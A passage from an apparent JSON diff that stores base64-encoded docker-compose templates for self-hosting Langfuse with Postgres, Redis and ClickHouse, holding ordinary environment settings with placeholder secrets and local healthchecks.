ICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvcHVibGljL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBsYW5nZnVzZS13b3JrZXI6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlLXdvcmtlcjozJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnU0FMVD0ke1NFUlZJQ0VfUEFTU1dPUkRfU0FMVH0nCiAgICAgIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUz0ke0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM6LWZhbHNlfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAgICAgLSAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAtIFJFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBSRURJU19QT1JUPTYzNzkKICAgICAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogICAgICAtICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIGNsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTctYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtaCBsb2NhbGhvc3QgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6OCcKICAgIGNvbW1hbmQ6CiAgICAgIC0gc2gKICAgICAgLSAnLWMnCiAgICAgIC0gJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICIkU0VSVklDRV9QQVNTV09SRF9SRURJUyInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3JlZGlzX2RhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAkU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgICAgIC0gUElORwogICAgICBpbnRlcnZhbDogM3MKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDEwCiAgY2xpY2tob3VzZToKICAgIGltYWdlOiAnY2xpY2tob3VzZS9jbGlja2hvdXNlLXNlcnZlcjpsYXRlc3QnCiAgICB1c2VyOiAnMTAxOjEwMScKICAgIGVudmlyb25tZW50OgogICAgICAtICdDTElDS0hPVVNFX0RCPSR7Q0xJQ0tIT1VTRV9EQjotZGVmYXVsdH0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2RhdGE6L3Zhci9saWIvY2xpY2tob3VzZScKICAgICAgLSAnbGFuZ2Z1c2VfY2xpY2tob3VzZV9sb2dzOi92YXIvbG9nL2NsaWNraG91c2Utc2VydmVyJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICd3Z2V0IC0tbm8tdmVyYm9zZSAtLXRyaWVzPTEgLS1zcGlkZXIgaHR0cDovL2xvY2FsaG9zdDo4MTIzL3BpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogIC0gJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAtICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogIC0gJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogIC0gUkVESVNfSE9TVD1yZWRpcwogIC0gUkVESVNfUE9SVD02Mzc5CiAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgLSAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKc2VydmljZXM6CiAgbGFuZ2Z1c2U6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlOjMnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgMDogJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgMTogJ0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke1BPU1RHUkVTX0RCOi1sYW5nZnVzZS1kYn0nCiAgICAgIDI6ICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgMzogJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIDQ6ICdURUxFTUVUUllfRU5BQkxFRD0ke1RFTEVNRVRSWV9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDU6ICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICA2OiAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIDc6ICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzJwogICAgICA4OiAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICA5OiAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIDEwOiBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAxMTogJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAgICAgMTI6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAxMzogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgMTQ6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMTU6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAxNjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIDE3OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIDE4OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAxOTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDIwOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAyMTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAyMjogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDIzOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMjQ6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMjU6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgMjY6I